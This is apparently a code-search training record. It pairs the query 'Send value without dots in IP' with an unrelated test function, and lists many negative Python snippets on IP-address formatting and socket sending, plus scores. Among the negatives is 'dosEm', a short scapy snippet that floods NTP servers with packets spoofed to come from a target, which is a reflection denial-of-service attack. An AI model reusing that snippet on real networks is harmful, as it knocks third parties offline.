bits):\n # print(IP, PORT)\n # print(s)\n # s.connect((IP, PORT))\n if sec > 1:\n sleep_time = .03\n else:\n sleep_time = sec / 10\n start = time.time()\n while time.time() < (start + sec):\n print(\"sending\")\n s.sendto(cmd.format(seq, bits).encode('utf-8'), (IP, PORT))\n time.sleep(sleep_time)\n seq += 1\n # s.close()\n return seq" ]
[ "0.63720393", "0.6112773", "0.6034202", "0.6031415", "0.601407", "0.6007722", "0.6005478", "0.5853208", "0.5850585", "0.5793232", "0.57886994", "0.57657415", "0.5760936", "0.5697663", "0.5660143", "0.56552243", "0.564769", "0.5638525", "0.5633917", "0.5625542", "0.56003445", "0.5594275", "0.55898905", "0.55722314", "0.5565514", "0.5558486", "0.5538668", "0.553131", "0.5509549", "0.55075693", "0.55056316", "0.5504903", "0.5501326", "0.5491247", "0.54786354", "0.5477796", "0.54341996", "0.5414625", "0.54069185", "0.5396016", "0.53779346", "0.53536206", "0.5351046", "0.5338247", "0.53316754", "0.53307766", "0.5330326", "0.53183675", "0.5318304", "0.531609", "0.53154784", "0.5308207", "0.5305799", "0.53032804", "0.52919257", "0.5289484", "0.5286316", "0.5282333", "0.5277508", "0.52769274", "0.5255134", "0.52516234", "0.5247481", "0.52459997", "0.5245943", "0.5244896", "0.5240547", "0.52287155", "0.5222877", "0.52219474", "0.52165365", "0.52073145", "0.52009535", "0.5196202", "0.51929575", "0.5191139", "0.51876533", "0.5184147", "0.51835537", "0.5180254", "0.517928", "0.5173474", "0.51717246", "0.51712984", "0.5168659", "0.51667476", "0.51635563", "0.51618224", "0.51618207", "0.5158089", "0.5155758", "0.5153953", "0.51524234", "0.5152147", "0.5150088", "0.51471066", "0.5144671", "0.5143695", "0.513857", "0.5137781", "0.51277834" ]
0.0
-1
Send value without dots in IP
def test_49(self): assert 'False' == Api.requestBlock('test-49', CustomFields=True)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_ip_dotted(self):\r\n return socket.inet_ntoa(struct.pack('>I', self.ip))", "def overlay_ip(ip):\n return \"192.168.{}.{}\".format( *ip.split(\".\")[2:])", "def send(value):\r\n return value", "def safe_addr(ip_addr):\n return '.'.join(ip_addr.split('.')[:2] + ['xxx', 'xxx'])", "def _send(self, what, value, address='localhost:44818', **kwargs):\n\n tag_string = ''\n tag_string = EnipProtocol._tuple_to_cpppo_tag(what, value)\n # print 'DEBUG enip _send tag_string: ', tag_string\n\n cmd = shlex.split(\n self._client_cmd +\n '--log ' + self._client_log +\n '--address ' + address +\n ' ' + tag_string\n )\n # print 'DEBUG enip _send cmd shlex list: ', cmd\n\n # TODO: pipe stdout and return the sent value\n try:\n client = subprocess.Popen(cmd, shell=False)\n client.wait()\n\n except Exception as error:\n print('ERROR enip _send: ', error)", "def defangIPaddr(address):\n address_as_list = list(address)\n length_of_address = len(address_as_list)\n for i in range(length_of_address):\n if address_as_list[i] == \".\":\n address_as_list[i] = \"[.]\"\n return \"\".join(address_as_list)", "def pack_ip(self, str_ip):\n return struct.pack(\">BBBB\", *[ int(c) for c in str_ip.split(\".\") ])", "def ip(self, mess, args):\n return '%s\\n' % urlgrabber.urlread('http://whatismyip.org')", "def ip_triplet(request):\n oip = get_ip(request=request)\n ips = oip.split(\".\")[:-1]\n ip = \".\".join(ips)\n return ip", "def send(self, value):\n pass", "def to_net(self, value):\n return value", "def format_ip(addr):\n return \\\n str(ord(addr[0])) + '.' + \\\n str(ord(addr[1])) + '.' + \\\n str(ord(addr[2])) + '.' + \\\n str(ord(addr[3]))", "def test_clean_ip(self):\n\n raw_ip = 'client=mail-ed1-f51.google.com[209.85.208.51]'\n result = clean_ip(raw_ip)\n self.assertEqual(result, '209.85.208.51')", "def reverse_dotted_decimals(ipaddress):\n return '.'.join(ipaddress.split('.')[::-1])", "def send(self, val, end=\"\\n\"):\n self.sock.send(to_bytes(\"{val}{end}\".format(val=val, end=end)))", "def filter_ip_address(self, string):\n count = string.count('.')\n newstring = string\n if count < 3:\n # Not enough components to matter\n return newstring\n\n dot_split = string.split('.')\n\n # Count the number of components that convert to an integer\n int_count = 0\n for component in dot_split:\n try:\n # Note: _ is pythonic for unused variable\n _ = int(component)\n int_count = int_count + 1\n except ValueError:\n pass\n\n if int_count >= 4:\n # Replace everything\n newstring = string.replace('.', '-')\n\n return newstring", "def send(self, x):\n print x", "def sendingString(self):\n return ''", "def __str__(self):\n return \"{}\".format(visiteur.ip)", "def send(self,message):\n self.transport.write(message, (\"228.0.0.5\", udpbport))", "def test_ip(self):\n ##Todo: Improve this check\n ip = socket.gethostbyname(socket.gethostname())\n ip = [int(i) for i in ip.split('.')]\n assert len(ip) == 4\n assert ip[0] == 10\n assert ip[1] == 137\n assert ip[2] == 1\n assert ip[3] >= 1 and ip[3] <= 255", "def __str__(self):\n \n return self._addr[0] + \":\" + str(self._addr[1])", "def getServerIP():\n # Create a UDP socket at client side\n UDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n UDPClientSocket.settimeout(0.15)\n\n \n for i in ['127.0.0.1']+list(range(0,256)):#iterating through all network IPs....127.0.0.1 is localhost\n try:\n IP=\"192.168.2.\"+str(i) if i!='127.0.0.1' else i #\n print(IP,end=\" \") \n UDPClientSocket.sendto(bytesToSend, (IP, 20001))#send message\n msg,IP = UDPClientSocket.recvfrom(bufferSize)#get response\n if (msg==str.encode(ACK_MESSAGE)):\n print()#printed IP wont clear without this command\n cls()#if IP found it clears all the console \n return IP[0]\n except Exception as e:\n print(e)\n \n return 0", "def __str__(self):\n return self.the_ip", "def echo(s_socket):\r\n value = raw_input(\"#> \")\r\n bytes_value = to_bytes(len(value) + 5, 4, 'little')\r\n s_socket.send('d' + bytes_value + value)\r\n print(s_socket.recv(64))", "def ipAddress():\n \n sk = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sk.connect((\"8.8.8.8\", 80))\n ip = (sk.getsockname()[0])\n sk.close()\n return str(ip)", "def _send(self, p: str, s) -> bytes:\n\n b = self._to_netstring(p.encode('ascii'))\n\n failure = s.sendall(b)\n if failure is not None:\n self._send(p, s)\n return b", "def routepack(value):\n return str(value).replace(\"/\",\"!\")", "def replace_dots(data):\n data = re.sub(':', ' : ', data)\n return data", "def sendValue(self, value):\n\n print(f'Sending: {value}\\n')\n self.ser.write(bytes([value]))\n self.ser.write('\\n'.encode(\"ascii\"))\n\n self.ser.reset_input_buffer()\n ser_bytes = self.ser.read(1)\n print(f'Receiving\\nraw data: {ser_bytes}')\n\n\n #decoded_bytes = (ser_bytes.decode(\"ascii\"))\n\n #print(f'Ascii Value: {decoded_bytes}', flush=True)", "def prepare_value(self, value):\n if value is None:\n return value\n value = value.replace(\" \", \"\").replace(\".\", \"\")\n if value:\n return \"%s.%s.%s.%s\" % (value[0:3], value[3:7], value[7:11], value[11:])\n return value", "def change_ip(sender_socket, ip, port):\n sender_socket.sendto(bytes(\"change ip\", \"UTF-8\"), (ip, port))\n new_ip_str = input(\"New Host IP Address: \")\n sender_socket.sendto(bytes(new_ip_str, \"UTF-8\"), (ip, port))\n sleep(0.5)\n status = sender_socket.recv(BUFFER_SIZE)\n status_message = status.decode(\"UTF-8\")\n if \"IP Address Successfully Changed\" in status_message:\n print(status_message)\n return True\n else:\n print(status_message)\n return False", "def _send(self, what, value, address, **kwargs):\n\n print('_send: please override me.')", "def showIP(ans, ip):\n\tparam = ans.split(\"=\")[1]\n\tprint \"%s\\t\\t http://%s:%s\" % (param, ip, port)", "def ip(self) -> str:\n return pulumi.get(self, \"ip\")", "def sprint_addr(addr: bytes) -> str:\n\n if not len(addr) or not addr:\n return \"\"\n\n return str(ipaddress.ip_address(addr))", "def sendPing(self, payload=None):", "def get_random_ip():\n return \".\".join(str(random.randrange(1, 255)) for i in range(4))", "def genIp():\n ip = \".\".join(str(random.randint(0, 255)) for _ in range(4))\n return ip", "def get_ip_string():\n return netifaces.ifaddresses('br0')[netifaces.AF_INET][0]['addr']", "def get_primary_ip(options, index):\n\n second_octet = 160 + index\n return \"192.%s.1.1\" % second_octet", "def format_ipv4(value, mask=None):\n value_ipv4 = \".\".join([str(int(x, 16)) for x in re.findall('..', \"{:08x}\".format(value))])\n if mask is None:\n return value_ipv4\n value_mask = \".\".join([str(int(x, 16)) for x in re.findall('..', \"{:08x}\".format(mask))])\n return \"{}/{}\".format(value_ipv4, value_mask)", "def get_ip(self):", "def get_local_host_ip(self) -> str:", "def handler(value, provider, **kwargs): # pylint: disable=W0613\n\n ip = requests.get(value).text.strip()\n LOGGER.debug('external IP: %s', ip)\n return ip", "def JP_addr(self, addr):\n\t\tself.IP = addr", "def ip_info():\n return str(getIP())", "def format_ethernet(value, mask):\n value_ether = \":\".join(re.findall('..', \"{:012x}\".format(value)))\n if mask is None:\n return value_ether\n value_mask = \":\".join(re.findall('..', \"{:012x}\".format(mask)))\n return \"{}/{}\".format(value_ether, value_mask)", "def set_ip_opt(self, opt, value):\r\n if isinstance(opt, str):\r\n o = globals()[self.ip_opt_prefix+opt]\r\n elif isinstance(opt, list) or isinstance(opt, tuple):\r\n o = globals()[self.ip_opt_prefix+opt[self.v6]]\r\n else:\r\n raise TypeError('opt argument is of wrong type: '+repr(opt))\r\n self.setsockopt(self.ip_proto, o, value)", "def int2ip(n: int) -> str:\n return socket.inet_ntoa(struct.pack(\"!I\", n))", "def get_bot_ip(bot, update):\n sender = update.message.from_user\n if sender.id == Bot.OWNER_ID:\n msg_to_send = \"\"\n try:\n ip_string = check_output([\"curl\", \"ipinfo.io/ip\"],\n universal_newlines=True,\n timeout=5)\n msg_to_send = msgIpAddress + ip_string\n except CalledProcessError:\n msg_to_send = strings.errUnknown\n except TimeoutExpired:\n msg_to_send = strings.errTimeout\n update.message.reply_text(msg_to_send)", "def morseToPubIP(self, address):\n ip_from_morse = address[0];\n port_from_morse = address[1];\n \n ip_from_str = \"0.0.\";\n ip_from_str += str(ord(ip_from_morse[0])) + \".\" + str(ord(ip_from_morse[1]));\n port_from_str = str(ord(port_from_morse));\n \n return ip_from_str, port_from_str;", "def set_host_ip(self, host, host_ip):\n host.setIP(str(host_ip.ip), prefixLen=self.NETPREFIX)", "def test_replace_host_subnet(self):\n pass", "def sendString(self, data):\n self.transport.write(pack(\"!i\",len(data))+data)", "def get_single_net_client_addr (ip_addr, octetListDict = {'3' : 1}, ip_type = 'ipv4'):\n if ip_type == 'ipv4':\n ip_lst = ip_addr.split('.')\n\n for octet,increment in octetListDict.iteritems():\n int_octet = int(octet)\n if ((int_octet < 0) or (int_octet > 3)):\n raise ValueError('the provided octet is not legal in {0} format'.format(ip_type) )\n else:\n if (int(ip_lst[int_octet]) + increment) < 255:\n ip_lst[int_octet] = str(int(ip_lst[int_octet]) + increment)\n else:\n raise ValueError('the requested increment exceeds 255 client address limit')\n\n return '.'.join(ip_lst)\n\n else: # this is a ipv6 address, handle accordingly\n ip_lst = ip_addr.split(':')\n\n for octet,increment in octetListDict.iteritems():\n int_octet = int(octet)\n if ((int_octet < 0) or (int_octet > 7)):\n raise ValueError('the provided octet is not legal in {0} format'.format(ip_type) )\n else:\n if (int(ip_lst[int_octet]) + increment) < 65535:\n ip_lst[int_octet] = format( int(ip_lst[int_octet], 16) + increment, 'X')\n else:\n raise ValueError('the requested increment exceeds 65535 client address limit')\n\n return ':'.join(ip_lst)", "def getnetwork(ipaddr):\n return '192.168.1.0/24'", "def writeNetstring(self,data):\n if self.verbose: \n print \"client:\",data\n prefix = \"%i:\" % len(data)\n \n if len(prefix)+len(data) >= self.MAX_LENGTH:\n raise MessageSizeError()\n \n offset = 0\n lengthToSend = len(prefix)\n while offset < lengthToSend:\n slice = buffer(prefix, offset, lengthToSend - offset)\n amountWritten = self.sock.send(slice)\n offset += amountWritten\n \n offset = 0\n lengthToSend = len(data)\n while offset < lengthToSend:\n slice = buffer(data, offset, lengthToSend - offset)\n if self.verbose:\n print lengthToSend, offset, len(slice), slice\n amountWritten = self.sock.send(slice)\n # print amountWritten\n offset += amountWritten\n \n return self.sock.send(',')", "def sendnum(self, n):\n self.sendline(str(n))", "def ip_to_str(address):\n return socket.inet_ntop(socket.AF_INET, address)", "def command(self, value):\n self.tcp_comms.tcp_params.ISO = int(value)\n self.tcp_comms.send_iso(self.tcp_comms.tcp_params.ISO)", "def get_host_string(addr: AddressTupleVXType) -> str:\n if len(addr) >= 3:\n addr = cast(AddressTupleV6Type, addr)\n if addr[3]:\n return \"{}%{}\".format(addr[0], addr[3])\n return addr[0]", "def _send(self, what, value, address='localhost:502', **kwargs):\n\n colon_index = address.find(':')\n IP = '-i {} '.format(address[:colon_index])\n PORT = '-p {} '.format(address[colon_index+1:])\n # NOTE: following data is validated by client script\n MODE = '-m {} '.format('w')\n TYPE = '-t {} '.format(what[0])\n OFFSET = '-o {} '.format(what[1]) # NOTE: 0-based\n\n # NOTE: value is a list of bools or ints when write multiple times\n if 'count' in kwargs and kwargs['count'] > 1:\n count = kwargs['count']\n COUNT = '--count {} '.format(count)\n else:\n count = 1\n COUNT = '--count {} '.format(count)\n\n # NOTE: value is a int when writing to a register\n if what[0] == 'HR':\n if count == 1:\n VALUE = '-r {} '.format(value)\n else:\n VALUE = '-r '\n for v in value:\n VALUE += str(v)\n VALUE += ' '\n\n # NOTE: value is a bool when writing to a coil\n elif what[0] == 'CO':\n if count == 1:\n if value == True:\n VALUE = '-c {} '.format(1)\n else:\n VALUE = '-c {} '.format(0)\n else:\n VALUE = '-c '\n for v in value:\n if v == True:\n VALUE += str(1)\n else:\n VALUE += str(0)\n VALUE += ' '\n else:\n raise ValueError('IR and DI are read only data.')\n\n\n cmd = shlex.split(\n self._client_cmd +\n IP +\n PORT +\n MODE +\n TYPE +\n OFFSET +\n COUNT +\n VALUE\n )\n # print 'DEBUG modbus_send cmd shlex list: ', cmd\n\n # TODO: pipe stdout and return the sent value\n try:\n client = subprocess.Popen(cmd, shell=False)\n client.wait()\n\n except Exception as error:\n print('ERROR modbus _send: ', error)", "def JP_V0_addr(self, addr):\n\t\tself.IP = addr + self.V[0]", "def replace_dot(data):\n data = re.sub(\"[.]\", \" . \", data)\n return data", "def __send__(self,val):\n assert(len(val) == 1)\n assert(type(val) == bytes)\n v = int.from_bytes(val,byteorder=\"little\")\n if(self.verbose):\n pc.color_stdout(\"GREEN\")\n print(\">> %s\\t - %s\\t - %d\"% (hex(v),bin(v),v))\n pc.color_stdout(\"RESET\")\n self.port.write(val)", "def randomIP():\n\tip = \".\".join(map(str, (random.randint(0,255)for _ in range(4))))\n\treturn ip", "def ip_pad(ippart,fillupper=False):\n sp=ippart.split('.')\n fill='0'\n if fillupper:\n fill='255'\n \n quads=[]\n for part in sp:\n if part=='':\n continue\n quads.append(str(part))\n \n while len(quads)<4:\n quads.append(fill)\n \n return '.'.join(quads)", "def longToIp(longIp):\n stringIp = socket.inet_ntoa(struct.pack(\"!L\", longIp))\n return stringIp", "def ip():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((\"8.8.8.8\", 80))\n ip = s.getsockname()[0]\n s.close()\n return ip", "def int_2_ip_str(ip_int):\n return socket.inet_ntoa(struct.pack(\"!I\", ip_int))", "def safe_ip_format(ip):\r\n try:\r\n if netaddr.IPAddress(ip).version == 6:\r\n return '[%s]' % ip\r\n except (TypeError, netaddr.AddrFormatError): # hostname\r\n pass\r\n # it's IPv4 or hostname\r\n return ip", "def ip_white(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"ip_white\")", "def _send(self, data: str):\n try:\n self._sock.sendto(data.encode(\"ascii\"), self._addr)\n except (socket.error, RuntimeError):\n # No time for love, Dr. Jones!\n pass", "def ip(self) -> str:\n return self._ip", "def true_sendto(conn, data, address, special=False):\n if special:\n data = pickle.dumps(data)\n else:\n data = data.encode()\n conn.sendto(key.encrypt(data), (address[0], address[1])) # (ip_dst, dport)", "def format_ipv6(value, mask):\n value_ipv6 = \":\".join(re.findall('..', \"{:032x}\".format(value)))\n if mask is None:\n return value_ipv6\n value_mask = \":\".join(re.findall('..', \"{:032x}\".format(mask)))\n return \"{}/{}\".format(value_ipv6, value_mask)", "def generateIPAddress(base, subnet, host, mask):\n\n addr = str(base)+'.'+str(subnet)+'.' + str(host)\n if mask != None:\n addr = addr + '/' + str(mask)\n return addr", "def change_host(self, str_cef, address):\r\n tmp = str_cef\r\n if str_cef.find(\"CEF:\",0,len(str_cef)) != -1:\r\n tmp = str_cef[:21] + str(address[0]) + str_cef[25:]\r\n\r\n elif str_cef.find(\"|\",0,len(str_cef)) != -1:\r\n st = str_cef.find(\"|\",0,len(str_cef))\r\n st = str_cef.find(\"|\",st+1,len(str_cef))\r\n tmp = str_cef[:st+1]+str(address[0])+\"|\"+str_cef[st+1:]\r\n return tmp", "def hex_encode_ip(ip_addr):\n if not ip_addr:\n return None\n\n return base64.b16encode(ip_addr.packed).rjust(32, '0')", "def dosEm(target, ntplist, data, currentserver):\n ntpserver = ntplist[currentserver] #LOAD THE SERVER\n packet = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data) #CONSTRUIRE LE PAQUER\n send(packet,loop=1) #ENVOYER ", "def sendTCP_raw_single(m,ip,port):\n s=socket.socket()\n s.settimeout(1)\n s.connect((ip,port))\n s.send(m.data)\n #print (\"RetVal: %s\" % s.recv(1000))\n return s.recv(1000)", "def GetIPAddr():\n cmd = \"ifconfig | awk '/192/ {print $2}'\"\n res = Run(cmd).replace(\"\\n\", \"\") # remove end of line char\n return res.replace(\"addr:\", \"\") # remove \"addr:\" prefix", "def ipwrap(address: Any) -> str:\n try:\n if not isinstance(address, int):\n ipaddress.IPv6Address(address)\n return f\"[{address}]\"\n except ValueError:\n pass\n\n return str(address)", "def handle_hexip(bot, ievent):\n if not ievent.args:\n return ievent.missing('<ip | hex ip>')\n is_a = None\n if _re_hexip.match(ievent.args[0]):\n is_a = 'hexip'\n else:\n try:\n socket.inet_pton(socket.AF_INET, ievent.args[0])\n is_a = 'defip'\n except socket.error:\n pass\n if not is_a:\n ievent.missing('<ip | hex ip>')\n return\n if is_a == 'hexip':\n ip = []\n for i in range(4):\n ip.append(str(int(ievent.args[0][i*2:i*2+2], 16)))\n ip = '.'.join(ip)\n nevent = copy.copy(ievent)\n nevent.args = [ip]\n handle_dns(bot, nevent)\n else:\n test = ievent.args[0].split('.')\n ip = 16777216 * int(test[0]) + 65536 * int(test[1]) + 256 * \\\nint(test[2]) + int(test[3])\n ievent.reply('ip %s = %08x' % (ievent.args[0], ip))", "def _repr_remote(self):\n return \"%s:%d\" % (self.remote_address)", "def _format_senders_reference_20(self, val):\n if val:\n sett_obj = acm.FSettlement[str(val)]\n val = \"%s-%s-%s-%s\" % (get_settlement_reference_prefix(), str(val), str(get_message_version_number(sett_obj)), str(self.swift_message_type[2:5]))\n return val", "def send_protocol_message(self, msg):\n self.conn.send(msg + \"\\0\")", "def AioNodeToIpAddressString(node):\n ip = aio_node_to_ip_address.AioNodeToIpAddress(node)\n return '%d.%d.%d.%d' % (ip.a, ip.b, ip.c, ip.d)", "def gateway(self):\n return ''", "def fill_dots(message):\r\n length = len(message)\r\n power = int(np.ceil(np.log2(length)))\r\n return message + (\".\" * (2**power - length))", "def send(self, value, convergence=False):\n # dump to json format\n data = json.dumps(dict({\"gain\" : value, \"convergence\" : convergence})).encode()\n print(\"Sending value {} as data {}\".format(value, data))\n self.sock.sendall(data)", "def routeunpack(value):\n return str(value).replace(\"!\",\"/\")", "def get_ip_type1(self) -> str:\n hex_ip = hexlify(self.message)[152:160]\n ip_addr = int(hex_ip[6:8] + hex_ip[4:6] + hex_ip[2:4] + hex_ip[0:2], 16)\n return inet_ntoa(pack(\"<L\", ip_addr))", "def get_internal_ip(self, external_ip):\n if external_ip[-1:] == '2':\n return external_ip[:-1] + '1'\n else:\n # not a proper ip of a neighbor\n return ''", "def api_myip():\n return request.remote_addr, 200, {'Content-Type': 'text/plain'}", "def to_vxlan(ip_addr):\n return \"192.168.\" + \".\".join(ip_addr.split(\".\")[2:])", "def ip(self, ip: str):\n\n self._ip = ip", "def ip_address(self) -> str:\n return pulumi.get(self, \"ip_address\")", "def _format_senders_correspondent_53A(self, val):\n senders_correspondent_account = val.get('ACCOUNT')\n senders_correspondent_bic = val.get('BIC')\n if senders_correspondent_bic:\n if senders_correspondent_account:\n val = \"/\" + str(senders_correspondent_account) + \"\\n\" + str(senders_correspondent_bic)\n else:\n val = str(senders_correspondent_bic)\n return val", "def host_ip(host):\n return host.cmd('ip addr show {}-eth1 | awk \\'/inet / {{ print $2 }}\\' | cut -d\\'/\\' -f1'.format(host.name, host.name), stdout=sp.PIPE).strip()" ]
[ "0.6917071", "0.61488545", "0.60871255", "0.58816665", "0.58673185", "0.5860521", "0.5847382", "0.5811409", "0.58054906", "0.5722551", "0.5714136", "0.57023436", "0.5676384", "0.56233644", "0.55774444", "0.5576495", "0.554843", "0.5535844", "0.55323035", "0.5489128", "0.54597867", "0.54564595", "0.54387826", "0.5399396", "0.5382818", "0.5381494", "0.5371384", "0.5370731", "0.5370071", "0.5360317", "0.53538465", "0.53252316", "0.5322162", "0.5320388", "0.52622426", "0.525924", "0.52225244", "0.52139664", "0.52002823", "0.5177546", "0.517592", "0.5173895", "0.51590323", "0.51563543", "0.5154231", "0.51465666", "0.5140369", "0.51243603", "0.5110817", "0.51096725", "0.51010984", "0.50928915", "0.50843185", "0.50783074", "0.50748396", "0.50674546", "0.506706", "0.506353", "0.50562644", "0.5054757", "0.50516444", "0.5048651", "0.5045679", "0.5043806", "0.50419575", "0.5041111", "0.5035866", "0.50349796", "0.5030868", "0.5009152", "0.5008586", "0.5007043", "0.5003607", "0.49989814", "0.4995327", "0.4988693", "0.49813434", "0.49765956", "0.4975375", "0.49683517", "0.49669847", "0.49540395", "0.49503505", "0.4949982", "0.49484196", "0.49433756", "0.49420905", "0.49373403", "0.4932384", "0.49281833", "0.49238205", "0.491978", "0.49194634", "0.49140045", "0.49132007", "0.4909109", "0.4909102", "0.49047318", "0.4896553", "0.48964947", "0.4889826" ]
0.0
-1
Send dots in wrong places e in IP
def test_50(self): assert 'False' == Api.requestBlock('test-50', CustomFields=True)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_ip_dotted(self):\r\n return socket.inet_ntoa(struct.pack('>I', self.ip))", "def overlay_ip(ip):\n return \"192.168.{}.{}\".format( *ip.split(\".\")[2:])", "def defangIPaddr(address):\n address_as_list = list(address)\n length_of_address = len(address_as_list)\n for i in range(length_of_address):\n if address_as_list[i] == \".\":\n address_as_list[i] = \"[.]\"\n return \"\".join(address_as_list)", "def format_ip(addr):\n return \\\n str(ord(addr[0])) + '.' + \\\n str(ord(addr[1])) + '.' + \\\n str(ord(addr[2])) + '.' + \\\n str(ord(addr[3]))", "def safe_addr(ip_addr):\n return '.'.join(ip_addr.split('.')[:2] + ['xxx', 'xxx'])", "def ip(self, mess, args):\n return '%s\\n' % urlgrabber.urlread('http://whatismyip.org')", "def reverse_dotted_decimals(ipaddress):\n return '.'.join(ipaddress.split('.')[::-1])", "def filter_ip_address(self, string):\n count = string.count('.')\n newstring = string\n if count < 3:\n # Not enough components to matter\n return newstring\n\n dot_split = string.split('.')\n\n # Count the number of components that convert to an integer\n int_count = 0\n for component in dot_split:\n try:\n # Note: _ is pythonic for unused variable\n _ = int(component)\n int_count = int_count + 1\n except ValueError:\n pass\n\n if int_count >= 4:\n # Replace everything\n newstring = string.replace('.', '-')\n\n return newstring", "def ip_triplet(request):\n oip = get_ip(request=request)\n ips = oip.split(\".\")[:-1]\n ip = \".\".join(ips)\n return ip", "def fill_dots(message):\r\n length = len(message)\r\n power = int(np.ceil(np.log2(length)))\r\n return message + (\".\" * (2**power - length))", "def safe_ip_format(ip):\r\n try:\r\n if netaddr.IPAddress(ip).version == 6:\r\n return '[%s]' % ip\r\n except (TypeError, netaddr.AddrFormatError): # hostname\r\n pass\r\n # it's IPv4 or hostname\r\n return ip", "def test_ip(self):\n ##Todo: Improve this check\n ip = socket.gethostbyname(socket.gethostname())\n ip = [int(i) for i in ip.split('.')]\n assert len(ip) == 4\n assert ip[0] == 10\n assert ip[1] == 137\n assert ip[2] == 1\n assert ip[3] >= 1 and ip[3] <= 255", "def pack_ip(self, str_ip):\n return struct.pack(\">BBBB\", *[ int(c) for c in str_ip.split(\".\") ])", "def replace_dots(data):\n data = re.sub(':', ' : ', data)\n return data", "def ip_pad(ippart,fillupper=False):\n sp=ippart.split('.')\n fill='0'\n if fillupper:\n fill='255'\n \n quads=[]\n for part in sp:\n if part=='':\n continue\n quads.append(str(part))\n \n while len(quads)<4:\n quads.append(fill)\n \n return '.'.join(quads)", "def sprint_addr(addr: bytes) -> str:\n\n if not len(addr) or not addr:\n return \"\"\n\n return str(ipaddress.ip_address(addr))", "def morseToPubIP(self, address):\n ip_from_morse = address[0];\n port_from_morse = address[1];\n \n ip_from_str = \"0.0.\";\n ip_from_str += str(ord(ip_from_morse[0])) + \".\" + str(ord(ip_from_morse[1]));\n port_from_str = str(ord(port_from_morse));\n \n return ip_from_str, port_from_str;", "def format_host(host):\n\n host = strip_suffix(host, \".lan.urlab.be\")\n host = strip_suffix(host, \".lan\")\n host = strip_suffix(host, \".local\")\n host = strip_suffix(host, \"iPodtouch\")\n host = strip_suffix(host, \"-PC\")\n host = strip_suffix(host, \"-pc\")\n\n host = strip_prefix(host, \"pc-\")\n host = strip_prefix(host, \"PC-\")\n host = strip_prefix(host, \"DESKTOP-\")\n host = strip_prefix(host, \"LAPTOP-\")\n host = strip_prefix(host, \"iPod-de-\")\n host = strip_prefix(host, \"iPadde\")\n\n return host", "def test_clean_ip(self):\n\n raw_ip = 'client=mail-ed1-f51.google.com[209.85.208.51]'\n result = clean_ip(raw_ip)\n self.assertEqual(result, '209.85.208.51')", "def __str__(self):\n \n return self._addr[0] + \":\" + str(self._addr[1])", "def get_random_ip():\n return \".\".join(str(random.randrange(1, 255)) for i in range(4))", "def __str__(self):\n return \"{}\".format(visiteur.ip)", "def format_url_address(address):\n try:\n addr = netaddr.IPAddress(address)\n if addr.version == constants.IPV6_FAMILY:\n return \"[%s]\" % address\n else:\n return str(address)\n except netaddr.AddrFormatError:\n return address", "def escape_dot(s):\n\treturn s. \\\n\t\treplace(\"{\", \"\\\\{\").\\\n\t\treplace(\"}\", \"\\\\}\").\\\n\t\treplace(\"\\n\", \"\").\\\n\t\treplace(\"\\r\", \"\")", "def get_host_string(addr: AddressTupleVXType) -> str:\n if len(addr) >= 3:\n addr = cast(AddressTupleV6Type, addr)\n if addr[3]:\n return \"{}%{}\".format(addr[0], addr[3])\n return addr[0]", "def get_ip_type1(self) -> str:\n hex_ip = hexlify(self.message)[152:160]\n ip_addr = int(hex_ip[6:8] + hex_ip[4:6] + hex_ip[2:4] + hex_ip[0:2], 16)\n return inet_ntoa(pack(\"<L\", ip_addr))", "def get_single_net_client_addr (ip_addr, octetListDict = {'3' : 1}, ip_type = 'ipv4'):\n if ip_type == 'ipv4':\n ip_lst = ip_addr.split('.')\n\n for octet,increment in octetListDict.iteritems():\n int_octet = int(octet)\n if ((int_octet < 0) or (int_octet > 3)):\n raise ValueError('the provided octet is not legal in {0} format'.format(ip_type) )\n else:\n if (int(ip_lst[int_octet]) + increment) < 255:\n ip_lst[int_octet] = str(int(ip_lst[int_octet]) + increment)\n else:\n raise ValueError('the requested increment exceeds 255 client address limit')\n\n return '.'.join(ip_lst)\n\n else: # this is a ipv6 address, handle accordingly\n ip_lst = ip_addr.split(':')\n\n for octet,increment in octetListDict.iteritems():\n int_octet = int(octet)\n if ((int_octet < 0) or (int_octet > 7)):\n raise ValueError('the provided octet is not legal in {0} format'.format(ip_type) )\n else:\n if (int(ip_lst[int_octet]) + increment) < 65535:\n ip_lst[int_octet] = format( int(ip_lst[int_octet], 16) + increment, 'X')\n else:\n raise ValueError('the requested increment exceeds 65535 client address limit')\n\n return ':'.join(ip_lst)", "def AioNodeToIpAddressString(node):\n ip = aio_node_to_ip_address.AioNodeToIpAddress(node)\n return '%d.%d.%d.%d' % (ip.a, ip.b, ip.c, ip.d)", "def change_host(self, str_cef, address):\r\n tmp = str_cef\r\n if str_cef.find(\"CEF:\",0,len(str_cef)) != -1:\r\n tmp = str_cef[:21] + str(address[0]) + str_cef[25:]\r\n\r\n elif str_cef.find(\"|\",0,len(str_cef)) != -1:\r\n st = str_cef.find(\"|\",0,len(str_cef))\r\n st = str_cef.find(\"|\",st+1,len(str_cef))\r\n tmp = str_cef[:st+1]+str(address[0])+\"|\"+str_cef[st+1:]\r\n return tmp", "def _grab_host(self):\r\n host = \"\"\r\n while True:\r\n while self._char != -1 and not self._char in \".\\x00\\t\\r\\n\":\r\n host += self._char\r\n self._get_char()\r\n if self._char == \".\":\r\n host += \".\"\r\n self._get_char()\r\n else:\r\n break\r\n return host", "def replace_dot(data):\n data = re.sub(\"[.]\", \" . \", data)\n return data", "def hex2ip(self, irc, msg, args, iphex):\n \n ip = self._numToDottedQuad(iphex)\n if ip and len(iphex) == 8:\n record = self._record_by_addr(ip)\n if record:\n reply = u'%s (%s)' % (ip, self._geoip_city_check(record))\n else:\n reply = u'geoIP Fehler!'\n else:\n reply = u'Invalide Eingabe'\n irc.reply(reply.encode('utf-8'))", "def showIP(ans, ip):\n\tparam = ans.split(\"=\")[1]\n\tprint \"%s\\t\\t http://%s:%s\" % (param, ip, port)", "def get_internal_ip(self, external_ip):\n if external_ip[-1:] == '2':\n return external_ip[:-1] + '1'\n else:\n # not a proper ip of a neighbor\n return ''", "def format_ethernet(value, mask):\n value_ether = \":\".join(re.findall('..', \"{:012x}\".format(value)))\n if mask is None:\n return value_ether\n value_mask = 